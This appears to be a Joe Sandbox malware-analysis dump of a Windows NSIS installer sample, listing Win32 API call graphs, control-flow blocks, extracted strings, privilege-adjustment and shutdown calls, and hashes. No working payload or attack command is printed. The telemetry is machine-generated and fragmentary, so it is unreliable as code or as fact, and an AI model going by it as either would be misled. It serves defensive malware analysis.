4223->4224 4225 401e8c 4224->4225 4226 402c41 17 API calls 4225->4226 4227 401e95 4226->4227 4228 402c41 17 API calls 4227->4228 4229 401e9e 4228->4229 4230 401423 24 API calls 4229->4230 4231 401ea5 4230->4231 4238 4058c3 ShellExecuteExW 4231->4238 4233 401ee7 4234 406722 5 API calls 4233->4234 4236 40288b 4233->4236 4235 401f01 CloseHandle 4234->4235 4235->4236 4238->4233 4239 40437e lstrlenW 4240 40439d 4239->4240 4241 40439f WideCharToMultiByte 4239->4241 4240->4241 4242 4019ff 4243 402c41 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402c41 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4046ff 4251 40472b 4250->4251 4252 40473c 4250->4252 4311 4058e1 GetDlgItemTextW 4251->4311 4254 404748 GetDlgItem 4252->4254 4260 4047a7 4252->4260 4255 40475c 4254->4255 4259 404770 SetWindowTextW 4255->4259 4263 405c17 4 API calls 4255->4263 4256 40488b 4309 404a3a 4256->4309 4313 4058e1 GetDlgItemTextW 4256->4313 4257 404736 4258 40652b 5 API calls 4257->4258 4258->4252 4264 40420e 18 API calls 4259->4264 4260->4256 4265 4062b9 17 API calls 4260->4265 4260->4309 4262 404275 8 API calls 4267 404a4e 4262->4267 4268 404766 4263->4268 4269 40478c 4264->4269 4270 40481b SHBrowseForFolderW 4265->4270 4266 4048bb 4271 405c74 18 API calls 4266->4271 4268->4259 4275 405b6c 3 API calls 4268->4275 4272 40420e 18 API calls 4269->4272 4270->4256 4273 404833 CoTaskMemFree 4270->4273 4274 4048c1 4271->4274 4276 40479a 4272->4276 4277 405b6c 3 API calls 4273->4277 4314 406297 lstrcpynW 4274->4314 4275->4259 4312 404243 SendMessageW 4276->4312 4279 404840 4277->4279 4282 404877 SetDlgItemTextW 4279->4282 4286 4062b9 17 API calls 4279->4286 4281 4047a0 4284 406671 5 API calls 4281->4284 4282->4256 4283 4048d8 4285 406671 5 API calls 4283->4285 4284->4260 4293 4048df 4285->4293 4287 40485f lstrcmpiW 4286->4287 4287->4282 4289 404870 lstrcatW 4287->4289 4288 404920 4315 406297 
lstrcpynW 4288->4315 4289->4282 4291 404927 4292 405c17 4 API calls 4291->4292 4294 40492d GetDiskFreeSpaceW 4292->4294 4293->4288 4297 405bb8 2 API calls 4293->4297 4298 404978 4293->4298 4296 404951 MulDiv 4294->4296 4294->4298 4296->4298 4297->4293 4299 4049e9 4298->4299 4301 404b84 20 API calls 4298->4301 4300 404a0c 4299->4300 4302 40140b 2 API calls 4299->4302 4316 404230 KiUserCallbackDispatcher 4300->4316 4303 4049d6 4301->4303 4302->4300 4305 4049eb SetDlgItemTextW 4303->4305 4306 4049db 4303->4306 4305->4299 4307 404abb 20 API calls 4306->4307 4307->4299 4308 404a28 4308->4309 4310 404658 SendMessageW 4308->4310 4309->4262 4310->4309 4311->4257 4312->4281 4313->4266 4314->4283 4315->4291 4316->4308 4317 401000 4318 401037 BeginPaint GetClientRect 4317->4318 4319 40100c DefWindowProcW 4317->4319 4321 4010f3 4318->4321 4322 401179 4319->4322 4323 401073 CreateBrushIndirect FillRect DeleteObject 4321->4323 4324 4010fc 4321->4324 4323->4321 4325 401102 CreateFontIndirectW 4324->4325 4326 401167 EndPaint 4324->4326 4325->4326 4327 401112 6 API calls 4325->4327 4326->4322 4327->4326 4328 401503 4329 40150b 4328->4329 4331 40151e 4328->4331 4330 402c1f 17 API calls 4329->4330 4330->4331 3297 402484 3308 402c81 3297->3308 3300 402c41 17 API calls 3301 402497 3300->3301 3302 4024a2 RegQueryValueExW 3301->3302 3307 40288b 3301->3307 3303 4024c8 RegCloseKey 3302->3303 3304 4024c2 3302->3304 3303->3307 3304->3303 3313 4061de wsprintfW 3304->3313 3309 402c41 17 API calls 3308->3309 3310 402c98 3309->3310 3311 406104 RegOpenKeyExW 3310->3311 3312 40248e 3311->3312 3312->3300 3313->3303 4332 402104 4333 402c41 17 API calls 4332->4333 4334 40210b 4333->4334 4335 402c41 17 API calls 4334->4335 4336 402115 4335->4336 4337 402c41 17 API calls 4336->4337 4338 40211f 4337->4338 4339 402c41 17 API calls 4338->4339 4340 402129 4339->4340 4341 402c41 17 API calls 4340->4341 4343 402133 4341->4343 4342 402172 CoCreateInstance 4347 402191 4342->4347 4343->4342 4344 402c41 17 API 
calls 4343->4344 4344->4342 4345 401423 24 API calls 4346 402250 4345->4346 4347->4345 4347->4346 3314 401f06 3315 402c41 17 API calls 3314->3315 3316 401f0c 3315->3316 3317 4052ff 24 API calls 3316->3317 3318 401f16 3317->3318 3329 405880 CreateProcessW 3318->3329 3321 401f3f CloseHandle 3325 40288b 3321->3325 3324 401f31 3326 401f41 3324->3326 3327 401f36 3324->3327 3326->3321 3337 4061de wsprintfW 3327->3337 3330 4058b3 CloseHandle 3329->3330 3331 401f1c 3329->3331 3330->3331 3331->3321 3331->3325 3332 406722 WaitForSingleObject 3331->3332 3333 40673c 3332->3333 3334 40674e GetExitCodeProcess 3333->3334 3338 4066ad 3333->3338 3334->3324 3337->3321 3339 4066ca PeekMessageW 3338->3339 3340 4066c0 DispatchMessageW 3339->3340 3341 4066da WaitForSingleObject 3339->3341 3340->3339 3341->3333 3609 40230c 3610 402314 3609->3610 3612 40231a 3609->3612 3611 402c41 17 API calls 3610->3611 3611->3612 3613 402328 3612->3613 3614 402c41 17 API calls 3612->3614 3615 402336 3613->3615 3616 402c41 17 API calls 3613->3616 3614->3613 3617 402c41 17 API calls 3615->3617 3616->3615 3618 40233f WritePrivateProfileStringW 3617->3618 4348 40190c 4349 401943 4348->4349 4350 402c41 17 API calls 4349->4350 4351 401948 4350->4351 4352 4059a9 67 API calls 4351->4352 4353 401951 4352->4353 4354 401f8c 4355 402c41 17 API calls 4354->4355 4356 401f93 4355->4356 4357 406671 5 API calls 4356->4357 4358 401fa2 4357->4358 4359 402026 4358->4359 4360 401fbe GlobalAlloc 4358->4360 4360->4359 4361 401fd2 4360->4361 4362 406671 5 API calls 4361->4362 4363 401fd9 4362->4363 4364 406671 5 API calls 4363->4364 4365 401fe3 4364->4365 4365->4359 4369 4061de wsprintfW 4365->4369 4367 402018 4370 4061de wsprintfW 4367->4370 4369->4367 4370->4359 3619 40238e 3620 4023c1 3619->3620 3621 402396 3619->3621 3622 402c41 17 API calls 3620->3622 3623 402c81 17 API calls 3621->3623 3624 4023c8 3622->3624 3625 40239d 3623->3625 3631 402cff 3624->3631 3627 4023a7 3625->3627 3629 4023d5 3625->3629 3628 402c41 17 API 
calls 3627->3628 3630 4023ae RegDeleteValueW RegCloseKey 3628->3630 3630->3629 3632 402d0c 3631->3632 3633 402d13 3631->3633 3632->3629 3633->3632 3635 402d44 3633->3635 3636 406104 RegOpenKeyExW 3635->3636 3637 402d72 3636->3637 3638 402dec 3637->3638 3640 402d76 3637->3640 3638->3632 3639 402d98 RegEnumKeyW 3639->3640 3641 402daf RegCloseKey 3639->3641 3640->3639 3640->3641 3643 402dd0 RegCloseKey 3640->3643 3645 402d44 6 API calls 3640->3645 3642 406671 5 API calls 3641->3642 3644 402dbf 3642->3644 3643->3638 3646 402de0 RegDeleteKeyW 3644->3646 3647 402dc3 3644->3647 3645->3640 3646->3638 3647->3638 4371 40190f 4372 402c41 17 API calls 4371->4372 4373 401916 4372->4373 4374 4058fd MessageBoxIndirectW 4373->4374 4375 40191f 4374->4375 4376 401491 4377 4052ff 24 API calls 4376->4377 4378 401498 4377->4378 4379 401d14 4380 402c1f 17 API calls 4379->4380 4381 401d1b 4380->4381 4382 402c1f 17 API calls 4381->4382 4383 401d27 GetDlgItem 4382->4383 4384 402592 4383->4384 4385 402598 4386 4025c7 4385->4386 4387 4025ac 4385->4387 4388 4025fb 4386->4388 4389 4025cc 4386->4389 4390 402c1f 17 API calls 4387->4390 4392 402c41 17 API calls 4388->4392 4391 402c41 17 API calls 4389->4391 4395 4025b3 4390->4395 4393 4025d3 WideCharToMultiByte lstrlenA 4391->4393 4394 402602 lstrlenW 4392->4394 4393->4395 4394->4395 4396 40262f 4395->4396 4397 402645 4395->4397 4399 405e6e 5 API calls 4395->4399 4396->4397 4398 405e3f WriteFile 4396->4398 4398->4397 4399->4396 4400 40149e 4401 4022f7 4400->4401 4402 4014ac PostQuitMessage 4400->4402 4402->4401 4403 401c1f 4404 402c1f 17 API calls 4403->4404 4405 401c26 4404->4405 4406 402c1f 17 API calls 4405->4406 4407 401c33 4406->4407 4408 401c48 4407->4408 4409 402c41 17 API calls 4407->4409 4410 401c58 4408->4410 4413 402c41 17 API calls 4408->4413 4409->4408 4411 401c63 4410->4411 4412 401caf 4410->4412 4414 402c1f 17 API calls 4411->4414 4415 402c41 17 API calls 4412->4415 4413->4410 4416 401c68 4414->4416 4417 401cb4 4415->4417 4418 
402c1f 17 API calls 4416->4418 4419 402c41 17 API calls 4417->4419 4420 401c74 4418->4420 4421 401cbd FindWindowExW 4419->4421 4422 401c81 SendMessageTimeoutW 4420->4422 4423 401c9f SendMessageW 4420->4423 4424 401cdf 4421->4424 4422->4424 4423->4424 4425 402aa0 SendMessageW 4426 402ac5 4425->4426 4427 402aba InvalidateRect 4425->4427 4427->4426 4428 402821 4429 402827 4428->4429 4430 402ac5 4429->4430 4431 40282f FindClose 4429->4431 4431->4430 3241 4015a3 3242 402c41 17 API calls 3241->3242 3243 4015aa SetFileAttributesW 3242->3243 3244 4015bc 3243->3244 4432 4029a8 4433 402c1f 17 API calls 4432->4433 4434 4029ae 4433->4434 4435 4029d5 4434->4435 4436 4029ee 4434->4436 4442 40288b 4434->4442 4439 4029da 4435->4439 4445 4029eb 4435->4445 4437 402a08 4436->4437 4438 4029f8 4436->4438 4441 4062b9 17 API calls 4437->4441 4440 402c1f 17 API calls 4438->4440 4446 406297 lstrcpynW 4439->4446 4440->4445 4441->4445 4445->4442 4447 4061de wsprintfW 4445->4447 4446->4442 4447->4442 4448 4028ad 4449 402c41 17 API calls 4448->4449 4451 4028bb 4449->4451 4450 4028d1 4453 405d68 2 API calls 4450->4453 4451->4450 4452 402c41 17 API calls 4451->4452 4452->4450 4454 4028d7 4453->4454 4476 405d8d GetFileAttributesW CreateFileW 4454->4476 4456 4028e4 4457 4028f0 GlobalAlloc 4456->4457 4458 402987 4456->4458 4459 402909 4457->4459 4460 40297e CloseHandle 4457->4460 4461 4029a2 4458->4461 4462 40298f DeleteFileW 4458->4462 4477 403324 SetFilePointer 4459->4477 4460->4458 4462->4461 4464 40290f 4465 40330e ReadFile 4464->4465 4466 402918 GlobalAlloc 4465->4466 4467 402928 4466->4467 4468 40295c 4466->4468 4470 403116 31 API calls 4467->4470 4469 405e3f WriteFile 4468->4469 4471 402968 GlobalFree 4469->4471 4475 402935 4470->4475 4472 403116 31 API calls 4471->4472 4473 40297b 4472->4473 4473->4460 4474 402953 GlobalFree 4474->4468 4475->4474 4476->4456 4477->4464 4478 401a30 4479 402c41 17 API calls 4478->4479 4480 401a39 ExpandEnvironmentStringsW 4479->4480 4481 401a4d 4480->4481 4483 
401a60 4480->4483 4482 401a52 lstrcmpW 4481->4482 4481->4483 4482->4483 3689 402032 3690 402044 3689->3690 3691 4020f6 3689->3691 3692 402c41 17 API calls 3690->3692 3694 401423 24 API calls 3691->3694 3693 40204b 3692->3693 3695 402c41 17 API calls 3693->3695 3700 402250 3694->3700 3696 402054 3695->3696 3697 40206a LoadLibraryExW 3696->3697 3698 40205c GetModuleHandleW 3696->3698 3697->3691 3699 40207b 3697->3699 3698->3697 3698->3699 3709 4066e0 WideCharToMultiByte 3699->3709 3703 4020c5 3705 4052ff 24 API calls 3703->3705 3704 40208c 3706 401423 24 API calls 3704->3706 3707 40209c 3704->3707 3705->3707 3706->3707 3707->3700 3708 4020e8 FreeLibrary 3707->3708 3708->3700 3710 40670a GetProcAddress 3709->3710 3711 402086 3709->3711 3710->3711 3711->3703 3711->3704 3717 403d35 3718 403e88 3717->3718 3719 403d4d 3717->3719 3721 403ed9 3718->3721 3722 403e99 GetDlgItem GetDlgItem 3718->3722 3719->3718 3720 403d59 3719->3720 3723 403d64 SetWindowPos 3720->3723 3724 403d77 3720->3724 3726 403f33 3721->3726 3731 401389 2 API calls 3721->3731 3725 40420e 18 API calls 3722->3725 3723->3724 3728 403d94 3724->3728 3729 403d7c ShowWindow 3724->3729 3730 403ec3 SetClassLongW 3725->3730 3727 40425a SendMessageW 3726->3727 3747 403e83 3726->3747 3753 403f45 3727->3753 3732 403db6 3728->3732 3733 403d9c DestroyWindow 3728->3733 3729->3728 3734 40140b 2 API calls 3730->3734 3735 403f0b 3731->3735 3736 403dbb SetWindowLongW 3732->3736 3737 403dcc 3732->3737 3787 404197 3733->3787 3734->3721 3735->3726 3740 403f0f SendMessageW 3735->3740 3736->3747 3738 403e75 3737->3738 3739 403dd8 GetDlgItem 3737->3739 3797 404275 3738->3797 3743 403e08 3739->3743 3744 403deb SendMessageW IsWindowEnabled 3739->3744 3740->3747 3741 40140b 2 API calls 3741->3753 3742 404199 DestroyWindow EndDialog 3742->3787 3749 403e15 3743->3749 3750 403e5c SendMessageW 3743->3750 3751 403e28 3743->3751 3761 403e0d 3743->3761 3744->3743 3744->3747 3746 4041c8 ShowWindow 3746->3747 3748 4062b9 17 API calls 
3748->3753 3749->3750 3749->3761 3750->3738 3754 403e30 3751->3754 3755 403e45 3751->3755 3753->3741 3753->3742 3753->3747 3753->3748 3757 40420e 18 API calls 3753->3757 3778 4040d9 DestroyWindow 3753->3778 3788 40420e 3753->3788 3759 40140b 2 API calls 3754->3759 3758 40140b 2 API calls 3755->3758 3756 403e43 3756->3738 3757->3753 3760 403e4c 3758->3760 3759->3761 3760->3738 3760->3761 3794 4041e7 3761->3794 3763 403fc0 GetDlgItem 3764 403fd5 3763->3764 3765 403fdd ShowWindow KiUserCallbackDispatcher 3763->3765 3764->3765 3791 404230 KiUserCallbackDispatcher 3765->3791 3767 404007 EnableWindow 3771 40401b 3767->3771 3768 404020 GetSystemMenu EnableMenuItem SendMessageW 3769 404050 SendMessageW 3768->3769 3768->3771 3769->3771 3771->3768 3772 403d16 18 API calls 3771->3772 3792 404243 SendMessageW 3771->3792 3793 406297 lstrcpynW 3771->3793 3772->3771 3774 40407f lstrlenW 3775 4062b9 17 API calls 3774->3775 3776 404095 SetWindowTextW 3775->3776 3777 401389 2 API calls 3776->3777 3777->3753 3779 4040f3 CreateDialogParamW 3778->3779 3778->3787 3780 404126 3779->3780 3779->3787 3781 40420e 18 API calls 3780->3781 3782 404131 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3781->3782 3783 401389 2 API calls 3782->3783 3784 404177 3783->3784 3784->3747 3785 40417f ShowWindow 3784->3785 3786 40425a SendMessageW 3785->3786 3786->3787 3787->3746 3787->3747 3789 4062b9 17 API calls 3788->3789 3790 404219 SetDlgItemTextW 3789->3790 3790->3763 3791->3767 3792->3771 3793->3774 3795 4041f4 SendMessageW 3794->3795 3796 4041ee 3794->3796 3795->3756 3796->3795 3798 40428d GetWindowLongW 3797->3798 3799 404338 3797->3799 3798->3799 3800 4042a2 3798->3800 3799->3747 3800->3799 3801 4042d2 3800->3801 3802 4042cf GetSysColor 3800->3802 3803 4042e2 SetBkMode 3801->3803 3804 4042d8 SetTextColor 3801->3804 3802->3801 3805 404300 3803->3805 3806 4042fa GetSysColor 3803->3806 3804->3803 3807 404311 3805->3807 3808 404307 SetBkColor 3805->3808 3806->3805 3807->3799 3809 404324 
DeleteObject 3807->3809 3810 40432b CreateBrushIndirect 3807->3810 3808->3807 3809->3810 3810->3799 4489 401735 4490 402c41 17 API calls 4489->4490 4491 40173c SearchPathW 4490->4491 4492 401757 4491->4492 4493 402a35 4494 402c1f 17 API calls 4493->4494 4495 402a3b 4494->4495 4496 402a72 4495->4496 4497 40288b 4495->4497 4499 402a4d 4495->4499 4496->4497 4498 4062b9 17 API calls 4496->4498 4498->4497 4499->4497 4501 4061de wsprintfW 4499->4501 4501->4497 4502 4014b8 4503 4014be 4502->4503 4504 401389 2 API calls 4503->4504 4505 4014c6 4504->4505 4506 4046b8 4507 4046c8 4506->4507 4508 4046ee 4506->4508 4509 40420e 18 API calls 4507->4509 4510 404275 8 API calls 4508->4510 4511 4046d5 SetDlgItemTextW 4509->4511 4512 4046fa 4510->4512 4511->4508 4513 401db9 GetDC 4514 402c1f 17 API calls 4513->4514 4515 401dcb GetDeviceCaps MulDiv ReleaseDC 4514->4515 4516 402c1f 17 API calls 4515->4516 4517 401dfc 4516->4517 4518 4062b9 17 API calls 4517->4518 4519 401e39 CreateFontIndirectW 4518->4519 4520 402592 4519->4520 4521 40283b 4522 402843 4521->4522 4523 402847 FindNextFileW 4522->4523 4526 402859 4522->4526 4524 4028a0 4523->4524 4523->4526 4527 406297 lstrcpynW 4524->4527 4527->4526 3843 40543e 3844 4055e8 3843->3844 3845 40545f GetDlgItem GetDlgItem GetDlgItem 3843->3845 3847 4055f1 GetDlgItem CreateThread CloseHandle 3844->3847 3848 405619 3844->3848 3888 404243 SendMessageW 3845->3888 3847->3848 3891 4053d2 5 API calls 3847->3891 3849 405630 ShowWindow ShowWindow 3848->3849 3850 405669 3848->3850 3851 405644 3848->3851 3890 404243 SendMessageW 3849->3890 3857 404275 8 API calls 3850->3857 3852 4056a4 3851->3852 3855 405658 3851->3855 3856 40567e ShowWindow 3851->3856 3852->3850 3859 4056b2 SendMessageW 3852->3859 3853 4054cf 3858 4054d6 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3853->3858 3860 4041e7 SendMessageW 3855->3860 3862 405690 3856->3862 3863 40569e 3856->3863 3861 405677 3857->3861 3864 405544 3858->3864 3865 405528 SendMessageW SendMessageW 
3858->3865 3859->3861 3866 4056cb CreatePopupMenu 3859->3866 3860->3850 3869 4052ff 24 API calls 3862->3869 3870 4041e7 SendMessageW 3863->3870 3867 405557 3864->3867 3868 405549 SendMessageW 3864->3868 3865->3864 3871 4062b9 17 API calls 3866->3871 3872 40420e 18 API calls 3867->3872 3868->3867 3869->3863 3870->3852 3873 4056db AppendMenuW 3871->3873 3874 405567 3872->3874 3875 4056f8 GetWindowRect 3873->3875 3876 40570b TrackPopupMenu 3873->3876 3877 405570 ShowWindow 3874->3877 3878 4055a4 GetDlgItem SendMessageW 3874->3878 3875->3876 3876->3861 3879 405726 3876->3879 3880 405593 3877->3880 3881 405586 ShowWindow 3877->3881 3878->3861 3882 4055cb SendMessageW SendMessageW 3878->3882 3883 405742 SendMessageW 3879->3883 3889 404243 SendMessageW 3880->3889 3881->3880 3882->3861 3883->3883 3884 40575f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3883->3884 3886 405784 SendMessageW 3884->3886 3886->3886 3887 4057ad GlobalUnlock SetClipboardData CloseClipboard 3886->3887 3887->3861 3888->3853 3889->3878 3890->3851

Control-flow Graph

[Control-flow graph starting at block 40336c; legend: Executed / Not Executed]
                                                                                            APIs
                                                                                            • SetErrorMode.KERNELBASE ref: 0040338F
                                                                                            • GetVersion.KERNEL32 ref: 00403395
                                                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033C8
                                                                                            • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403405
                                                                                            • OleInitialize.OLE32(00000000), ref: 0040340C
                                                                                            • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 00403428
                                                                                            • GetCommandLineW.KERNEL32(007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040343D
                                                                                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\You7ynHizy.exe",00000020,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,?,00000006,00000008,0000000A), ref: 00403475
                                                                                              • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
                                                                                              • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
                                                                                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035AF
                                                                                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035C0
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035CC
                                                                                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035E0
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035E8
                                                                                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035F9
                                                                                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403601
                                                                                            • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 00403615
                                                                                              • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
                                                                                            • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036E0
                                                                                            • ExitProcess.KERNEL32 ref: 00403701
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403714
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403723
                                                                                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040372E
                                                                                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\You7ynHizy.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040373A
                                                                                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403756
                                                                                            • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 004037B0
                                                                                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\You7ynHizy.exe,0079F6E0,00000001,?,00000006,00000008,0000000A), ref: 004037C4
                                                                                            • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037F1
                                                                                            • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403827
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
                                                                                            • AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
                                                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
                                                                                            • ExitProcess.KERNEL32 ref: 004038A7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2161992965.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_You7ynHizy.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                            • String ID: "C:\Users\user\Desktop\You7ynHizy.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen$C:\Users\user\Desktop$C:\Users\user\Desktop\You7ynHizy.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                            • API String ID: 3441113951-3297939638
                                                                                            • Opcode ID: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                                            • Instruction ID: 91e47d7dade8a9784fbcad93861d46a8301334ec9f5f2e607ded2091cc9dec5c
                                                                                            • Opcode Fuzzy Hash: 9d8f68ffad0294d88a57d06caf52fd5e4d58377833c7f28028a7ac4efefba988
                                                                                            • Instruction Fuzzy Hash: 04D12671600300ABD720BF719D45B2B3AACEB8174AF00887FF981B62D1DB7D8955876E

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 139 40543e-405459 140 4055e8-4055ef 139->140 141 40545f-405526 GetDlgItem * 3 call 404243 call 404b9c GetClientRect GetSystemMetrics SendMessageW * 2 139->141 143 4055f1-405613 GetDlgItem CreateThread CloseHandle 140->143 144 405619-405626 140->144 164 405544-405547 141->164 165 405528-405542 SendMessageW * 2 141->165 143->144 146 405644-40564e 144->146 147 405628-40562e 144->147 150 405650-405656 146->150 151 4056a4-4056a8 146->151 148 405630-40563f ShowWindow * 2 call 404243 147->148 149 405669-405672 call 404275 147->149 148->146 161 405677-40567b 149->161 154 405658-405664 call 4041e7 150->154 155 40567e-40568e ShowWindow 150->155 151->149 158 4056aa-4056b0 151->158 154->149 162 405690-405699 call 4052ff 155->162 163 40569e-40569f call 4041e7 155->163 158->149 159 4056b2-4056c5 SendMessageW 158->159 166 4057c7-4057c9 159->166 167 4056cb-4056f6 CreatePopupMenu call 4062b9 AppendMenuW 159->167 162->163 163->151 168 405557-40556e call 40420e 164->168 169 405549-405555 SendMessageW 164->169 165->164 166->161 176 4056f8-405708 GetWindowRect 167->176 177 40570b-405720 TrackPopupMenu 167->177 178 405570-405584 ShowWindow 168->178 179 4055a4-4055c5 GetDlgItem SendMessageW 168->179 169->168 176->177 177->166 180 405726-40573d 177->180 181 405593 178->181 182 405586-405591 ShowWindow 178->182 179->166 183 4055cb-4055e3 SendMessageW * 2 179->183 184 405742-40575d SendMessageW 180->184 185 405599-40559f call 404243 181->185 182->185 183->166 184->184 186 40575f-405782 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405784-4057ab SendMessageW 186->188 188->188 189 4057ad-4057c1 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->166
                                                                                            APIs
                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040549C
                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 004054AB
                                                                                            • GetClientRect.USER32(?,?), ref: 004054E8
                                                                                            • GetSystemMetrics.USER32(00000002), ref: 004054EF
                                                                                            • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405510
                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405521
                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405534
                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405542
                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405555
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405577
                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040558B
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055AC
                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055BC
                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055D5
                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055E1
                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 004054BA
                                                                                              • Part of subcall function 00404243: SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004055FE
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_000053D2,00000000), ref: 0040560C
                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 00405613
                                                                                            • ShowWindow.USER32(00000000), ref: 00405637
                                                                                            • ShowWindow.USER32(?,00000008), ref: 0040563C
                                                                                            • ShowWindow.USER32(00000008), ref: 00405686
                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056BA
                                                                                            • CreatePopupMenu.USER32 ref: 004056CB
                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056DF
                                                                                            • GetWindowRect.USER32(?,?), ref: 004056FF
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405718
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405750
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405760
                                                                                            • EmptyClipboard.USER32 ref: 00405766
                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405772
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0040577C
                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405790
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 004057B0
